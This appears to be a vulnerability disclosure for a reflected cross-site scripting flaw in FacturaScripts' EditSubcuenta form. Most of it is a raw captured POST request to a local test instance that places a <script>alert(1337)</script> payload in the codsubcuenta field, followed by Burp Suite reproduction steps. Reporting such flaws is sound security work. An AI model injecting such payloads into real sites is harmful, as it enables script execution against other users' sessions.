Cross-site scripting - Reflected in Create Subaccount via codsubcuenta
parameter.
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"
insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"
EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"
<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"
123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"
2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"
CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"
0
-----------------------------363416527826407339693188325960--
Accounting
section, choose New
and fill all form with anything valueBurp suite
intercept this request and modify codsubcuenta
parameter value with XSS payload
and click Forward
alert(1337)
execute